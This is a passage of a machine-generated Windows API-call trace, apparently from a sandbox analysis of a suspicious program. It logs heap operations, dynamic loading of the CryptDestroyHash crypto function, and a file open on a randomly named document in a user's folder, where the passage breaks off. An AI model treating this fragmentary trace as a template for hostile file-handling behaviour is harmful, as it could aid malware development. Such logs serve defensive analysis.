0x2e52120 [0268.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fd0 [0268.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0268.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fd0 | out: hHeap=0x970000) returned 1 [0268.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0268.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52120 | out: hHeap=0x970000) returned 1 [0268.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0268.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0268.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0268.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0268.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0268.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0268.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0268.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0268.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0268.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0268.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0268.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0268.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0268.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0268.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0268.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0268.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0268.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0268.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0268.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0268.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0268.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0268.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0268.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0268.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0268.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0268.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0268.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0268.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0268.425] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55258 [0268.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552e8 [0268.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55188 [0268.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0268.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55268 [0268.425] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.426] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55258 [0268.426] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0268.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0268.426] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0268.426] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0268.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0268.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0268.426] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.426] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0268.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0268.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0268.426] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0268.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0268.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0268.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0268.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0268.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69928 [0268.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69928, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0268.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0268.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0268.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0268.427] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0268.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0268.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0268.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0268.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0268.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0268.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0268.427] CryptDestroyHash (hHash=0xa87610) returned 1 [0268.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15c40 [0268.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0268.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0268.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0268.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0268.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0268.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0268.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0268.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0268.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0268.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0268.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0268.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0268.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0268.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0268.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0268.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0268.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0268.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0268.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0268.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0268.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0268.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0268.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0268.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0268.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0268.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0268.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0268.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0268.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0268.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0268.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15c40 | out: hHeap=0x970000) returned 1 [0268.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0268.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0268.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0268.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0268.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0268.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0268.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0268.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0268.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0268.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0268.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0268.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0268.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0268.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0268.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0268.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0268.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0268.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0268.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0268.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0268.429] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0268.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0268.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0268.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0268.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0268.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0268.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0268.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0268.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0268.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0268.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0268.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0268.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0268.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0268.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0268.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0268.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0268.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0268.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0268.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0268.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0268.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0268.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0268.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0268.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0268.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0268.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0268.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f58 | out: hHeap=0x970000) returned 1 [0268.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0268.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0268.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14b00 | out: hHeap=0x970000) returned 1 [0268.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0268.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0268.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0268.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0268.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0268.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0268.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0268.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0268.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0268.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0268.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0268.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0268.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0268.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0268.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0268.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0268.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0268.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0268.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0268.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0268.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0268.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0268.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0268.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0268.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0268.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0268.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0268.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0268.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0268.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0268.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0268.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0268.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0268.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0268.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0268.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0268.432] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0268.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0268.433] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0268.433] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0268.433] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0268.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0268.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0268.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0268.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0268.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0268.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0268.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0268.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0268.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0268.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0268.434] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/ypyYdQHgVdPHUEe.odt" (normalized: "c:\\users\\fd1hvy\\documents\\ypyydqhgvdphuee.odt"), 